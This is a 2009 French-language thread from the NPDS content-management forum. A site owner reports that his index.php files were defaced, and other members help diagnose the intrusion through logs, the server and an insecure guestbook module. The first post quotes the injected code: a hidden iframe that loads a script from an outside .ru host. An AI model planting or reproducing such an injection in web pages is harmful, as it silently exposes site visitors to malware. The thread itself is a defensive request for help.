logo

NPDS : Gestion de contenu et de communauté


Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
36 visiteur(s) et 0 membre(s) en ligne.
Activité du Site

Pages vues depuis 25/05/2001 : 108 404 907

  • Nb. de membres 8 693
  • Nb. d'articles 1 695
  • Nb. de forums 26
  • Nb. de sujets 8
  • Nb. de critiques 92

Top 10  Statistiques

Index du forum »»  Sécurité »» Code vérollé

Nouveau sujet
 Code vérollé#24426Répondre

3Contributeur(s)
AnonymeJireckWins57
3 Modérateur(s)
developpeurjpbJireck
Anonyme Anonymeicon_post
Hello, depuis quelques heure j'ai un probleme avec mon site :
celui-ci s'ouvre temps bien que mal, et en affichant la source j'ai un code qui c'est incruster dans mon fichier ''index.php''



<!iframe! src="http://a3j.ru:8080/ts/in.cgi?pepsi84" width=125 height=125 style="visibility: hidden"></!iframe!><div class="article_index">



d'ou cela vient il ? et comment y remedier ?
Anonyme Anonymeicon_post
Personne ???

En gros mon fichier index.php a été modifié je ne sais comment.

A la fin de celui ci il y avais le code cité.

J'ai remis le fichier index.php d'origine (avec un backup) mais si j'ai des articles sur mon index, en affichant la source on peut voir le meme codes...

J'ai enlever les article de mon index, mais maintenant si je les remets, j'ai une alerte Avast pour stopper la connexion... :paf
Jireck Jireckicon_post
log NPDS??? log serveur si tu as ???

Tu as d'autres scripts que npds ???
c'est quel version de npds ???
hebergeurs ???
Donne des infos
Anonyme Anonymeicon_post
L'anonyme est pas clair. :-P :-P :-P
Anonyme Anonymeicon_post
Log NPDS??? log serveur si tu as ???
Ou trouver ca ?

Tu as d'autres scripts que npds ???
Non

c'est quel version de npds ???
SABLE Evolution 08.06

hebergeurs ???
Phpnet
Anonyme Anonymeicon_post
J'ai bien des log serveur, mais comment voir si quelque chose tourne pas rond.??
Anonyme Anonymeicon_post
lien vers site?
Anonyme Anonymeicon_post
Bon ben en fait c TOUT les fichier INDEX.PHP qui ce trouve sur mon FTP...

Ils on tous été modifiés le 30/06/09 de 12h à 16h...

Mon site : http://www.airsoftevo.com

Wins57 Wins57icon_post
En ce moment il n'y a pas de probleme pour aller sur mon site, mais des que je met une news sur l'index, :D alerte AVAST... :D
Anonyme Anonymeicon_post
liste des modules installés?
Attention au livre d'or (module mal sécurisé)
Anonyme Anonymeicon_post
Il faut être précis svp.
tous les fichiers index.php : il y en a qu'un
Est-ce tous les fichiers index.html qui sont modifiés?
Qu'y a-t-il d'autres que NPDS sur le serveur?
Wins57 Wins57icon_post
liste des modules installés?

Td galerie
Td livredor

Attention au livre d'or (module mal sécurisé)
Que faire pour mieux le sécuriser ?


tous les fichiers index.php : il y en a qu'un
Pour ce site, oui.


Est-ce tous les fichiers index.html qui sont modifiés?
Pas ceux de npds.

Qu'y a-t-il d'autres que NPDS sur le serveur?
Des autres site a l'abandon
Anonyme Anonymeicon_post
Commence par faire du ménage sur ton serveur...
Wins57 Wins57icon_post
Commence par faire du ménage sur ton serveur...

Et après ?
Anonyme Anonymeicon_post
Mettre en fichier joint le fichier log pour en faire l'analyse...
Pour TD livre d'or, il me semble que ce module n'est pas validé Evolution par la team.
Si Lopez peut confirmer?
Personnellement pense qu'il faut mieux l'enlever, ce que j'ai fait sur mes sites.
Wins57 Wins57icon_post
Mettre en fichier joint le fichier log pour en faire l'analyse...


Pour TD livre d'or, il me semble que ce module n'est pas validé Evolution par la team.

J'ai quelque messages étrange par jour, mais ce n'est pas très problématique.

Message édité par : Wins57 / 02-07-2009 18:29



Message édité par : Wins57 / 03-07-2009 10:49

Anonyme Anonymeicon_post
Moi je virerai TD livre d'or mais cela risque de ne pas être suffisant.
A suivre...
Wins57 Wins57icon_post
Moi je virerai TD livre d'or mais cela risque de ne pas être suffisant.

Le problème avec le livre d'or m'étais connu, là c'est un autre problème...
Anonyme Anonymeicon_post
t'en es certain?
Désactiver TD livre d'or et virer les fichiers du serveur, c'est vite fait. Tu gardes les infos dans ta base...
Si c'est plus grave c'est que ton compte sur le serveur a été pénétré, alors il te restera à faire la Raz tout en conservant ta base de données et ton thème...
Si le ver est dans le fruit....mais là à priori, ce n'est pas NPDS qui en est la cause.
Evolution est très stable chez phpnet.
A suivre...
Wins57 Wins57icon_post
Il y a t-il un risque de voir le problème réapparaître si je

- récupère tout les fichiers NPDS de mon site actuel
- que j'efface tout les fichiers du serveur
- et que je réup les fichier NPDS d'antan ?

:-(

Merci de me consacrer un peu ton temps

PS : et dans les log rien d'anormal a part TD livre d'or ?
PS² : et il possible que la source du problème vienne de mon PC ?

Message édité par : Wins57 / 02-07-2009 23:09